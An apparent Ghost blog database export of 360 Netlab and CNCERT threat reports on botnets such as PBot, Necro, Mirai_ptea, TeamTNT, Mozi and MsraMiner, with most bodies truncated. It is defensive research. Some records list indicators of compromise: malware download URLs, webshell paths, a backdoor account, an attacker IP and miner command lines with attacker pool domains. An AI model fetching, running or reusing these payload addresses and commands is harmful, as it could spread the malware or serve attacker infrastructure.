<!--kg-card-begin: markdown--><p>本报告由国家互联网应急中心(CNCERT)与北京奇虎科技有限公司(360)共同发布。</p> <h1 id="">版权</h1> <p>版权声明: 本文为国家互联网应急中心(CNCERT)与北京奇虎科技有限公司(360)原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。</p> <h1 id="">概述</h1> <p><a href="https://twitter.com/SethKingHi/status/1399320943684571136">2021-05-31</a>我们监测到一个可疑Linux可执行文件<code>0c4...
本报告由国家互联网应急中心(CNCERT)与北京奇虎科技有限公司(360)共同发布。 版权 版权声明: 本文为国家互联网应急中心(CNCERT)与北京奇虎科技有限公司(360)原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 2021-05-31我们监测到一个可疑Linux可执行文件0c47d63b0d1d917549a31debb68ab678(downloader: http://205.185[.126.254/bins/exxsdee.arm), 经分析我们发现这是一个全新的使用自定义P2P协议的正在发展中的P2P Botnet。其主要功能为DDoS。正在编写本文之...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"\n本报告由国家互联网应急中心(CNCERT)与北京奇虎科技有限公司(360)共同发布。\n\n# 版权\n版权声明: 本文为国家互联网应急中心(CNCERT)与北京奇虎科技有限公司(360)原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。\n# 概述\n[2021-05-31](https://twitter.com/SethKingHi/status/1399320943684571136)我们监测到一个可疑Linux可执行文件`0c47d63b0d1d917549a3...
60c899953819e500076340c9
post
null
2021-06-16T09:48:43.000Z
63873b9a8b1c1e0007f52fd5
necro-history-tracking-2103-2106
0
2021-09-29T10:08:34.000Z
public
draft
null
null
Necro进化史及当前进展
<!--kg-card-begin: markdown--><h2 id="">版权</h2> <p>版权声明:本文为CNCERT &amp; Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。</p> <h2 id="">概述</h2> <p>过去的3个月,Necro家族活动非常频繁,持续的更新他们的恶意代码利用及投递方式,通过中国互联网信息中心的大网异常事件感知系统和Netlab蜜罐,我们一共捕捉了10多个不同版本的 setup.py 脚本代码,可以清楚的跟踪到它的更新发展情况。</p> <p>在它的更新过程中,伴随着各种新漏洞的利用尝试、新的域名的使用,以及对应的新的样本下载URL,...
版权 版权声明:本文为CNCERT & Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 过去的3个月,Necro家族活动非常频繁,持续的更新他们的恶意代码利用及投递方式,通过中国互联网信息中心的大网异常事件感知系统和Netlab蜜罐,我们一共捕捉了10多个不同版本的 setup.py 脚本代码,可以清楚的跟踪到它的更新发展情况。 在它的更新过程中,伴随着各种新漏洞的利用尝试、新的域名的使用,以及对应的新的样本下载URL,我们的BotMon系统可以有效地检测这些新的数据异常点,实现及时的跟踪分析及情报产出。 更新详述 我们以3.11号的样本为基础版本,顺...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"## 版权\n版权声明:本文为CNCERT & Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。\n\n## 概述\n过去的3个月,Necro家族活动非常频繁,持续的更新他们的恶意代码利用及投递方式,通过中国互联网信息中心的大网异常事件感知系统和Netlab蜜罐,我们一共捕捉了10多个不同版本的 setup.py 脚本代码,可以清楚的跟踪到它的更新发展情况。\n\n在它的更新过程中,伴随着各种新漏洞的利用尝试、新的域名的使用,以及对应的新的样本下载URL,我们的...
60c9c8fb3819e5000763417d
post
null
2021-06-18T11:27:19.000Z
63873b9a8b1c1e0007f52fd6
hei-hui-chan-ye
0
2021-06-18T11:27:50.000Z
public
draft
null
null
noname
null
null
{"version":"0.3.1","markups":[],"atoms":[],"cards":[],"sections":[[1,"p",[[0,[],0,""]]]],"ghostVersion":"3.0"}
60cc83173819e5000763430c
post
null
2021-06-22T01:46:19.000Z
63873b9a8b1c1e0007f52fd7
guan-yu-xin-xing-p2pjiang-shi-wang-luo-exxsdeede-fen-xi-bao-gao
0
2021-09-03T11:06:41.000Z
public
draft
null
null
关于新型P2P僵尸网络PBot的分析报告
<!--kg-card-begin: markdown--><p>本报告由国家互联网应急中心(CNCERT)与北京奇虎科技有限公司(360)共同发布。</p> <h1 id="">概述</h1> <p>CNCERT监测发现从2020年以来P2P僵尸网络异常活跃,如Mozi、Pinkbot等P2P僵尸网络家族在2020年均异常活跃,感染规模大、追溯源头难且难以治理,给网络空间带来较大威胁。</p> <p><a href="https://twitter.com/SethKingHi/status/1399320943684571136">2021-05-31</a>CNCERT和360捕获到一个全新的使用自定义P2P协议的僵尸网络。其...
本报告由国家互联网应急中心(CNCERT)与北京奇虎科技有限公司(360)共同发布。 概述 CNCERT监测发现从2020年以来P2P僵尸网络异常活跃,如Mozi、Pinkbot等P2P僵尸网络家族在2020年均异常活跃,感染规模大、追溯源头难且难以治理,给网络空间带来较大威胁。 2021-05-31CNCERT和360捕获到一个全新的使用自定义P2P协议的僵尸网络。其主要功能为DDoS。(当前很多杀毒引擎将其识别为Mirai或Gafgyt家族)。正在编写本文之际,我们收到了一封来自声称是Keksec组织成员的作者的邮件,称想和我们讨论一些事情,并提供了几张截图用来证明他就是该Botnet的作者。从其提供的截图看,该B...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"\n本报告由国家互联网应急中心(CNCERT)与北京奇虎科技有限公司(360)共同发布。\n\n# 概述\nCNCERT监测发现从2020年以来P2P僵尸网络异常活跃,如Mozi、Pinkbot等P2P僵尸网络家族在2020年均异常活跃,感染规模大、追溯源头难且难以治理,给网络空间带来较大威胁。\n\n[2021-05-31](https://twitter.com/SethKingHi/status/1399320943684571136)CNCERT和360捕获到一个全新的使用自定义P2P协议的僵尸网络...
60d140eb3819e500076343c2
post
null
2021-06-23T11:47:32.000Z
63873b9a8b1c1e0007f52fd8
analysis-of-seized-iran-domains
0
2021-07-02T15:00:05.000Z
public
published
__GHOST_URL__/content/images/2021/06/alalamtvnet.jpeg
2021-06-25T06:05:00.000Z
被拦截的伊朗域名的快速分析
<!--kg-card-begin: markdown--><p>伊朗新闻网站被美国阻断的事成为了最近的新闻热点,<a href="https://3w.huanqiu.com/a/c36dc8/43egq3g6ULK">报道</a>的主要内容是:</p> <blockquote> <p>美国司法部查封36个伊朗的新闻网站,其中许多网站与伊朗的“虚假信息活动”有关。这些网站首页通知显示,根据美国法律,这些网站已被美国政府查封,通知上还附有美国联邦调查局和美国商务部产业安全局的印徽。</p> </blockquote> <p>到底哪些新闻站被拦截了,我们查询了几个新闻源都没有给出全部被拦截的网站列表。<br> 其实这种从域名角度做拦截...
伊朗新闻网站被美国阻断的事成为了最近的新闻热点,报道的主要内容是: 美国司法部查封36个伊朗的新闻网站,其中许多网站与伊朗的“虚假信息活动”有关。这些网站首页通知显示,根据美国法律,这些网站已被美国政府查封,通知上还附有美国联邦调查局和美国商务部产业安全局的印徽。 到底哪些新闻站被拦截了,我们查询了几个新闻源都没有给出全部被拦截的网站列表。 其实这种从域名角度做拦截的手段,总是会在大网的DNS/whois数据中留下踪迹。我们利用这些网络基础数据分析出了32+2个被拦截的伊朗新闻网站的域名,其中的2个域名是在今年3月和4月份被拦截的;通过技术分析,也确认这些修改是直接通过注册局进行的改动。被拦截的域名的详细列表见文末...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"伊朗新闻网站被美国阻断的事成为了最近的新闻热点,[报道](https://3w.huanqiu.com/a/c36dc8/43egq3g6ULK)的主要内容是:\n> 美国司法部查封36个伊朗的新闻网站,其中许多网站与伊朗的“虚假信息活动”有关。这些网站首页通知显示,根据美国法律,这些网站已被美国政府查封,通知上还附有美国联邦调查局和美国商务部产业安全局的印徽。\n\n到底哪些新闻站被拦截了,我们查询了几个新闻源都没有给出全部被拦截的网站列表。\n其实这种从域名角度做拦截的手段,总是会在大网的DNS/who...
60d31f543819e50007634445
post
null
2021-06-25T02:47:50.000Z
63873b9a8b1c1e0007f52fd9
mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability
0
2021-07-08T02:29:53.000Z
public
published
null
2021-07-01T03:37:10.000Z
Mirai_ptea Botnet利用KGUARD DVR未公开漏洞报告
<!--kg-card-begin: markdown--><h1 id="">版权</h1> <p>版权声明:本文为Netlab原创,依据 <a href="https://creativecommons.org/licenses/by-sa/4.0/">CC BY-SA 4.0</a> 许可证进行授权,转载请附上出处链接及本声明。</p> <h1 id="">概述</h1> <p>2021-06-22我们检测到一个我们命名为<code>mirai_ptea</code>的mirai变种样本通过未知漏洞传播。经过分析,该漏洞为<a href="https://www.kguard.com.tw/">KGUARD DVR</a>未公...
版权 版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 2021-06-22我们检测到一个我们命名为mirai_ptea的mirai变种样本通过未知漏洞传播。经过分析,该漏洞为KGUARD DVR未公开的漏洞。从我们的分析看该漏洞存在于2016年的固件版本中。我们能找到的2017年之后的固件厂家均已经修复该漏洞。有意思的是,一天以后,6月23日,我们收到安全社区的询问,咨询我们是否看到一种新的DDoS攻击botnet。交叉对比线索,居然就是我们刚发现的这个botnet,目前看。这个僵尸网络处于活跃的攻击状态(见最后)。 时间线 * 2021...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"# 版权\n版权声明:本文为Netlab原创,依据 [CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0/) 许可证进行授权,转载请附上出处链接及本声明。\n# 概述\n2021-06-22我们检测到一个我们命名为`mirai_ptea`的mirai变种样本通过未知漏洞传播。经过分析,该漏洞为[KGUARD DVR](https://www.kguard.com.tw/)未公开的漏洞。从我们的分析看该漏洞存在于2016年的固件版本中。我们...
60d543d63819e500076345bb
post
null
2021-07-01T02:53:55.000Z
63873b9a8b1c1e0007f52fda
mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en
0
2021-07-03T02:38:53.000Z
public
published
null
2021-07-01T14:00:00.000Z
Mirai_ptea Botnet is Exploiting Undisclosed KGUARD DVR Vulnerability
<!--kg-card-begin: markdown--><h1 id="overview">Overview</h1> <p>On 2021-06-22 we detected a sample of a mirai variant that we named <code>mirai_ptea</code> propagating through a new vulnerability targeting <a href="https://www.kguard.com.tw/">KGUARD DVR</a>. Coincidently, a day later, on June 23, we received an inquir...
Overview On 2021-06-22 we detected a sample of a mirai variant that we named mirai_ptea propagating through a new vulnerability targeting KGUARD DVR. Coincidently, a day later, on June 23, we received an inquiry from the security community asking if we had seen a new DDoS botnet, cross-referencing some data, it was e...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"# Overview\n\nOn 2021-06-22 we detected a sample of a mirai variant that we named `mirai_ptea` propagating through a new vulnerability targeting [KGUARD DVR](https://www.kguard.com.tw/). Coincidently, a day later, on June 23, we received an inquiry from th...
60dd2e433819e50007634828
post
null
2021-08-04T10:44:05.000Z
63873b9a8b1c1e0007f52fdb
wei-xie-kuai-xun-teamtntxin-huo-dong-tong-guo-gan-ran-wang-ye-wen-jian-ti-gao-chuan-bo-neng-li
0
2021-08-06T01:43:30.000Z
public
published
null
2021-08-06T01:43:30.000Z
威胁快讯:TeamTNT新变种通过ELF打包bash脚本,正通过Hadoop ResourceManager RCE 传播
<!--kg-card-begin: markdown--><p>TeamTNT是一个比较活跃的挖矿家族,曾被腾讯和PAN等国内外安全厂商多次分析<a href="https://mp.weixin.qq.com/s/3vyqQBYt9pAZY1H_vTgacA">[1]</a><a href="https://unit42.paloaltonetworks.com/teamtnt-operations-cloud-environments/">[2]</a>,我们的BotMon系统也曾多次捕获。以往经验显示,TeamTNT家族喜欢使用新技术,比如名为EzuriCrypter的加密壳就是首次在TeamTNT样本中被检测到。近期,我们...
TeamTNT是一个比较活跃的挖矿家族,曾被腾讯和PAN等国内外安全厂商多次分析[1][2],我们的BotMon系统也曾多次捕获。以往经验显示,TeamTNT家族喜欢使用新技术,比如名为EzuriCrypter的加密壳就是首次在TeamTNT样本中被检测到。近期,我们的Anglerfish蜜罐再次捕获到TeamTNT的新变种,使用了如下新技术和工具: 1. 通过ELF文件包装入口bash脚本。 2. 集成了一个新的Go编写的扫描器。 从功能角度看,新变种和5月份曝光的版本 相比并没有大的变化,只是在个别功能上做了一些有意思的调整。 Exploit 本轮传播使用了已知漏洞 Hadoop_ResourceManag...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"TeamTNT是一个比较活跃的挖矿家族,曾被腾讯和PAN等国内外安全厂商多次分析[[1]](https://mp.weixin.qq.com/s/3vyqQBYt9pAZY1H_vTgacA)[[2]](https://unit42.paloaltonetworks.com/teamtnt-operations-cloud-environments/),我们的BotMon系统也曾多次捕获。以往经验显示,TeamTNT家族喜欢使用新技术,比如名为EzuriCrypter的加密壳就是首次在TeamTNT样本中被...
610a6f753819e500076348d8
post
null
2021-08-26T09:39:02.000Z
63873b9a8b1c1e0007f52fdc
the_death_of_mozi_cn
0
2022-02-09T07:05:50.000Z
public
published
null
2021-08-27T08:37:11.000Z
Mozi已死,余毒犹存
<!--kg-card-begin: markdown--><h1 id="">背景</h1> <p>360NETLAB于2019年12月首次披露了<a href="__GHOST_URL__/mozi-another-botnet-using-dht/"><strong>Mozi僵尸网络</strong></a>,到现在已有将近2年时间,在这段时间中,我们见证了它从一个小规模僵尸网络发展为巅峰时占据了极高比例IOT流量巨无霸的过程。</p> <p>现在Mozi的作者已经<code>被执法机关处置</code>,其中我们也全程提供了<a href="https://mp.weixin.qq.com/s/Su0-uU5JaUrAh8p...
背景 360NETLAB于2019年12月首次披露了Mozi僵尸网络,到现在已有将近2年时间,在这段时间中,我们见证了它从一个小规模僵尸网络发展为巅峰时占据了极高比例IOT流量巨无霸的过程。 现在Mozi的作者已经被执法机关处置,其中我们也全程提供了技术协助,因此我们认为后续在相当长的一段时间内它都不会继续更新。但我们知道,Mozi采用了P2P网络结构,而P2P网络的一大“优点”是健壮性好, 即使部分节点瘫痪,整个网络仍然能工作。所以即使Mozi作者不再发布新的更新,它仍然会存活一段时间,残余的节点仍然会去感染其它存在漏洞的设备,所以我们现在仍然能看到Mozi在传播,正可谓“百足之虫,死而不僵”。 许多安全厂商都对Moz...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"# 背景\n\n360NETLAB于2019年12月首次披露了[**Mozi僵尸网络**](__GHOST_URL__/mozi-another-botnet-using-dht/),到现在已有将近2年时间,在这段时间中,我们见证了它从一个小规模僵尸网络发展为巅峰时占据了极高比例IOT流量巨无霸的过程。\n\n现在Mozi的作者已经``被执法机关处置``,其中我们也全程提供了[技术协助](https://mp.weixin.qq.com/s/Su0-uU5JaUrAh8ptTzTCsA),因此我们认为后续在...
612761363819e50007634a76
post
null
2021-08-29T13:24:49.000Z
63873b9a8b1c1e0007f52fdd
xin-wei-xie-shu-zi-da-dao-nasthiefzheng-zai-tou-qu-xu-ni-qian-bao
0
2021-09-26T13:47:01.000Z
public
draft
null
null
新威胁:数字大盗Qnapthief正在觊觎你的数字钱包
null
null
{"version":"0.3.1","markups":[],"atoms":[],"cards":[],"sections":[[1,"p",[[0,[],0,""]]]],"ghostVersion":"3.0"}
612b8aa13819e50007634c05
post
null
2021-08-30T04:00:35.000Z
63873b9a8b1c1e0007f52fde
the-mostly-dead-mozi-and-its-lingering-bots
0
2022-02-09T07:05:40.000Z
public
published
null
2021-08-30T14:00:00.000Z
The Mostly Dead Mozi and Its’ Lingering Bots
<!--kg-card-begin: markdown--><h1 id="background">Background</h1> <p>It has been nearly 2 years since we (<strong>360NETLAB</strong>) first disclosed the <a href="__GHOST_URL__/mozi-another-botnet-using-dht/"><strong>Mozi botnet</strong></a> in December 2019, and in that time we have witnessed its development from a sm...
Background It has been nearly 2 years since we (360NETLAB) first disclosed the Mozi botnet in December 2019, and in that time we have witnessed its development from a small-scale botnet to a giant that accounted for an extremely high percentage of IOT traffic at its peak. Now that Mozi's authors have been taking cu...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"# Background\nIt has been nearly 2 years since we (**360NETLAB**) first disclosed the [**Mozi botnet**](__GHOST_URL__/mozi-another-botnet-using-dht/) in December 2019, and in that time we have witnessed its development from a small-scale botnet to a giant ...
612c57e33819e50007634c09
post
null
2021-09-06T10:49:43.000Z
63873b9a8b1c1e0007f52fdf
rimasuta-spread-with-ruijie-0day
0
2021-09-29T13:59:47.000Z
public
published
null
2021-09-28T04:20:32.000Z
Mirai_ptea_Rimasuta变种正在利用RUIJIE路由器在野0DAY漏洞传播
<!--kg-card-begin: markdown--><h1 id="">版权</h1> <p>版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。</p> <h1 id="">概述</h1> <p>2021年7月我们向社区公布了一个通过KGUARD DVR未公开漏洞传播的僵尸网络<a href="__GHOST_URL__/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/">Mirai_ptea</a>,一开始我们认为这是一个生命短暂的僵尸网络,不久就会消失不见,因此只给了...
版权 版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。 概述 2021年7月我们向社区公布了一个通过KGUARD DVR未公开漏洞传播的僵尸网络Mirai_ptea,一开始我们认为这是一个生命短暂的僵尸网络,不久就会消失不见,因此只给了它一个通用的名字。但很显然我们小看了这个家族背后的团伙,事实上该家族一直非常活跃,最近又观察到该家族正在利用RUIJIE NBR700系列路由器的在野0day漏洞传播。 比较有意思的是,该家族的作者曾经在某次更新的样本中加入了这么一段话吐槽我们的mirai_ptea命名: -_- you guys didnt pick ...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"# 版权\n版权声明:本文为Netlab原创,依据 CC BY-SA 4.0 许可证进行授权,转载请附上出处链接及本声明。\n\n# 概述\n2021年7月我们向社区公布了一个通过KGUARD DVR未公开漏洞传播的僵尸网络[Mirai_ptea](__GHOST_URL__/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/),一开始我们认为这是一个生命短暂的僵尸网络,不久就会消失不见,因此只给了它一个通用的名字...
6135f2473819e50007634c7c
post
null
2021-09-06T11:29:17.000Z
63873b9a8b1c1e0007f52fe0
mirai_vodka
0
2021-09-06T11:29:17.000Z
public
draft
null
null
Mirai_Vodka
null
null
{"version":"0.3.1","markups":[],"atoms":[],"cards":[],"sections":[[1,"p",[[0,[],0,""]]]],"ghostVersion":"3.0"}
6135fb8d3819e50007634ca5
post
null
2021-09-13T08:41:38.000Z
63873b9a8b1c1e0007f52fe1
orchard-dga
0
2022-08-05T03:31:07.000Z
public
published
null
2022-08-05T03:31:07.000Z
DGA家族Orchard持续变化,新版本用比特币交易信息生成DGA域名
<!--kg-card-begin: markdown--><p>DGA是一种经典的botnet对抗检测的技术,其原理是使用某种DGA算法,结合特定的种子和当前日期,定期生成大量的域名,而攻击者只是选择性的注册其中的极少数。对于防御者而言,因为难以事先确定哪些域名会被生成和注册,因而防御难度极大。</p> <p>360 netlab长期专注于botnet攻防技术的研究,维护了专门的<a href="https://data.netlab.360.com/dga/">DGA算法和情报库</a>,并通过订阅情报的方式与业界分享研究成果。近期我们在分析未知DGA域名时发现一例不但使用日期,还会同时使用中本聪的比特币账号交易信息来生成DGA...
DGA是一种经典的botnet对抗检测的技术,其原理是使用某种DGA算法,结合特定的种子和当前日期,定期生成大量的域名,而攻击者只是选择性的注册其中的极少数。对于防御者而言,因为难以事先确定哪些域名会被生成和注册,因而防御难度极大。 360 netlab长期专注于botnet攻防技术的研究,维护了专门的DGA算法和情报库,并通过订阅情报的方式与业界分享研究成果。近期我们在分析未知DGA域名时发现一例不但使用日期,还会同时使用中本聪的比特币账号交易信息来生成DGA域名的例子。因为比特币交易的不确定性,该技术比使用时间生成的DGA更难预测,因而防御难度更大。 该技术发现于一个名为Orchard的botnet家族。自从2021年2...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"DGA是一种经典的botnet对抗检测的技术,其原理是使用某种DGA算法,结合特定的种子和当前日期,定期生成大量的域名,而攻击者只是选择性的注册其中的极少数。对于防御者而言,因为难以事先确定哪些域名会被生成和注册,因而防御难度极大。\n\n360 netlab长期专注于botnet攻防技术的研究,维护了专门的[DGA算法和情报库](https://data.netlab.360.com/dga/),并通过订阅情报的方式与业界分享研究成果。近期我们在分析未知DGA域名时发现一例不但使用日期,还会同时使用中本聪...
613f0ec23819e50007634f04
post
null
2021-09-24T09:55:10.000Z
63873b9a8b1c1e0007f52fe2
msraminer-qian-fu-yi-jiu-de-wa-kuang-jiang-shi-wang-luo
0
2021-09-24T10:04:34.000Z
public
published
null
2018-03-16T10:00:00.000Z
MsraMiner: 潜伏已久的挖矿僵尸网络
<p>2017 年 11 月底,我们的 DNSMon 系统监测到几个疑似 DGA 产生的恶意域名活动有异常。经过我们深入分析,确认这背后是一个从 2017 年 5 月份运行至今的大型挖矿僵尸网络(Mining Botnet)。此僵尸网络最新的核心样本压缩包文件名为 MsraReportDataCache32.tlb ,我们将其命名为MsraMiner Botnet。</p><p>该僵尸网络的特征包括:</p><ul><li>运行时间:2017 年 5 月份运行至今</li><li>传播方式:利用 NSA 武器库来感染,通过 SMB 445 端口传播蠕虫式传播:样本自带 Web Server提供自身恶意代码下载。样本扩散主要靠失陷主机...
2017 年 11 月底,我们的 DNSMon 系统监测到几个疑似 DGA 产生的恶意域名活动有异常。经过我们深入分析,确认这背后是一个从 2017 年 5 月份运行至今的大型挖矿僵尸网络(Mining Botnet)。此僵尸网络最新的核心样本压缩包文件名为 MsraReportDataCache32.tlb ,我们将其命名为MsraMiner Botnet。 该僵尸网络的特征包括: * 运行时间:2017 年 5 月份运行至今 * 传播方式:利用 NSA 武器库来感染,通过 SMB 445 端口传播蠕虫式传播:样本自带 Web Server提供自身恶意代码下载。样本扩散主要靠失陷主机之间的 Web Server 或 Soc...
{"version":"0.3.1","atoms":[["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft...
614da07e3819e500076351b1
post
null
2021-09-24T10:02:09.000Z
63873b9a8b1c1e0007f52fe3
msraminer-uipdates-in-72-hours-after-disclose
0
2021-09-24T10:03:47.000Z
public
published
null
2018-03-19T10:02:00.000Z
MsraMiner 被曝光后72小时内的更新
<p>3月16日,我们<a href="__GHOST_URL__/msraminer-qian-fu-yi-jiu-de-wa-kuang-jiang-shi-wang-luo/">文章</a> 中,提到了 MsraMiner,一个潜伏已久的挖矿僵尸网络。</p><p>DNSMon 在过去的72小时内,提示我们该僵尸网络有更新,如下:</p><figure class="kg-card kg-image-card"><img src="__GHOST_URL__/content/images/2018/03/dnsmon_alert.png" class="kg-image" alt loading="lazy"></figure...
3月16日,我们文章 中,提到了 MsraMiner,一个潜伏已久的挖矿僵尸网络。 DNSMon 在过去的72小时内,提示我们该僵尸网络有更新,如下: * 样本压缩包文件改名为 ProximityUntilCache32.tlb ,原来叫 MsraReportDataCache32.tlb * 矿机程序被重命名为 WUDHostServices.exe ,原来是 TrustedHostServices.exe * 样本里的 C2 Domain 被替换为 tsk.tknuv.com / err.tknuv.com / slo.tknuv.com ,原来是 ccc.njaavfxcgk3.club / rer.njaavfxc...
{"version":"0.3.1","atoms":[],"cards":[["image",{"src":"__GHOST_URL__/content/images/2018/03/dnsmon_alert.png","alt":"","title":""}],["code",{"code":"A:\\ -o sim.jiovt.com:45560 -u letiot@protonmail.com \nA:\\ -o lol.jiovt.com:45560 -u letiot@protonmail.com \nA:\\ -o tzt.jiovt.com:45560 -u letiot@protonmail.com \nA:...
614da2213819e500076351b5
post
null
2021-09-28T01:55:31.000Z
63873b9a8b1c1e0007f52fe4
in-the-wild-qnap-nas-attacks-3
0
2021-12-31T04:02:54.000Z
public
draft
null
null
the hidden IoT Multi-hop Proxy Attack
<!--kg-card-begin: markdown--><h3 id="">背景介绍</h3> <p>2021年7月29号,360网络安全研究院Anglerfish蜜罐系统监测到一个攻击者使用QNAP Systems, Inc.公司的网络存储设备的6个远程命令执行漏洞, 组建多跳代理(Multi-hop Proxy)网络<a href="https://restoreprivacy.com/vpn/multi-hop/">[1]</a> <a href="https://attack.mitre.org/techniques/T1090/003/">[2]</a> 。</p> <p>我们发现部分漏洞仍存在QNAP QVR系列最新...
背景介绍 2021年7月29号,360网络安全研究院Anglerfish蜜罐系统监测到一个攻击者使用QNAP Systems, Inc.公司的网络存储设备的6个远程命令执行漏洞, 组建多跳代理(Multi-hop Proxy)网络[1] [2] 。 我们发现部分漏洞仍存在QNAP QVR系列最新固件程序中,并向QNAP厂商报告了其中4个。 2021年9月27号,QNAP Systems, Inc.公司发布安全公告 QSA-21-35 [3] 和 QSA-21-38 [4] ,并指出已在QVR 5.1.5 build 20210902和更高版本中解决了这些问题。 经过深入的分析,我们发现这个攻击者并不简单。攻击者从20...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"### 背景介绍\n2021年7月29号,360网络安全研究院Anglerfish蜜罐系统监测到一个攻击者使用QNAP Systems, Inc.公司的网络存储设备的6个远程命令执行漏洞, 组建多跳代理(Multi-hop Proxy)网络[[1]](https://restoreprivacy.com/vpn/multi-hop/) [[2]](https://attack.mitre.org/techniques/T1090/003/) 。\n\n我们发现部分漏洞仍存在QNAP QVR系列最新固件程序中...
615276133819e5000763528e
post
null
2021-09-28T03:39:24.000Z
63873b9a8b1c1e0007f52fe5
rimasuta-spread-with-ruijie-0day-en
0
2021-09-29T02:45:25.000Z
public
published
null
2021-09-28T14:00:00.000Z
Mirai_ptea_Rimasuta variant is exploiting a new RUIJIE router 0 day to spread
<!--kg-card-begin: markdown--><h1 id="overview">Overview</h1> <p>In July 2021 we blogged about <a href="__GHOST_URL__/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/">Mirai_ptea</a>, a botnet spreading through an undisclosed vulnerability in KGUARD DVR. At first we thought it was a short-lived ...
Overview In July 2021 we blogged about Mirai_ptea, a botnet spreading through an undisclosed vulnerability in KGUARD DVR. At first we thought it was a short-lived botnet that would soon disappear so we just gave it a generic name. But clearly we underestimated the group behind this family, which has in fact been very...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"# Overview\nIn July 2021 we blogged about [Mirai_ptea](__GHOST_URL__/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/), a botnet spreading through an undisclosed vulnerability in KGUARD DVR. At first we thought it was a short-lived ...
61528e6c3819e500076352d2
post
null
2021-10-14T02:12:40.000Z
63873b9a8b1c1e0007f52fe6
untitled-6
0
2021-10-14T02:12:40.000Z
public
draft
null
null
(Untitled)
null
null
{"version":"0.3.1","markups":[],"atoms":[],"cards":[],"sections":[[1,"p",[[0,[],0,""]]]],"ghostVersion":"3.0"}
616792183819e500076353cd
post
null
2021-10-14T02:23:56.000Z
63873b9a8b1c1e0007f52fe7
untitled-11
0
2021-10-14T02:35:33.000Z
public
draft
null
null
(Untitled)
<!--kg-card-begin: markdown--><h3 id="ioc">IoC</h3> <p>后门帐户:</p> <pre><code>wasthere </code></pre> <p>Webshell:</p> <pre><code>http://{target}/photo/Samples/rS82*********.php http://{target}/cgi-bin/sysdebug***.cgi </code></pre> <p>Multi-hop Proxy Attacker IP:</p> <pre><code>84.110.216.242 Israel AS...
IoC 后门帐户: wasthere Webshell: http://{target}/photo/Samples/rS82*********.php http://{target}/cgi-bin/sysdebug***.cgi Multi-hop Proxy Attacker IP: 84.110.216.242 Israel ASN8551 Bezeq International URL: http://188.161.164.161:19527/dropbearmulti_latest_arm http://185.19...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"### IoC\n后门帐户:\n```\nwasthere\n```\n\nWebshell:\n```\nhttp://{target}/photo/Samples/rS82*********.php\nhttp://{target}/cgi-bin/sysdebug***.cgi\n```\n\n\nMulti-hop Proxy Attacker IP:\n```\n84.110.216.242 \tIsrael \tASN8551 \tBe...
616794bc3819e500076353e6
post
null
2021-10-15T02:53:43.000Z
63873b9a8b1c1e0007f52fe8
360dta-announced
0
2021-12-06T04:51:14.000Z
public
published
__GHOST_URL__/content/images/2021/12/bg1.jpg
2021-10-21T02:13:23.000Z
七年一剑,360 DNS威胁分析平台
<p>        360Netlab (360 网络安全研究院) 自2014年成立以来,大网安全分析相关技术一直是我们的核心研究方向,我们是最早在国内提出从数据维度做安全的团队 ,并将大数据技术、AI技术和威胁情报应用于大网安全研究工作中。过去7年多的安全研究,我们取得了非常多耀眼的成果:我们是 360 情报云最主要的情报供应团队之一,建立了国内首个也是最大的公开<a href="https://passivedns.cn">PassiveDNS系统</a>,以及多个业内领先的Whois、证书、IP、样本等基础数据系统。我们诸多研究成果被国内外媒体转载报道,并多次在国际顶级安全会议发表演讲。我们在全球范围内率先披露了2位数以上有...
       360Netlab (360 网络安全研究院) 自2014年成立以来,大网安全分析相关技术一直是我们的核心研究方向,我们是最早在国内提出从数据维度做安全的团队 ,并将大数据技术、AI技术和威胁情报应用于大网安全研究工作中。过去7年多的安全研究,我们取得了非常多耀眼的成果:我们是 360 情报云最主要的情报供应团队之一,建立了国内首个也是最大的公开PassiveDNS系统,以及多个业内领先的Whois、证书、IP、样本等基础数据系统。我们诸多研究成果被国内外媒体转载报道,并多次在国际顶级安全会议发表演讲。我们在全球范围内率先披露了2位数以上有影响力的僵尸网络,并获得 FBI 的致谢,发现并命名的Satori僵尸网络的作者...
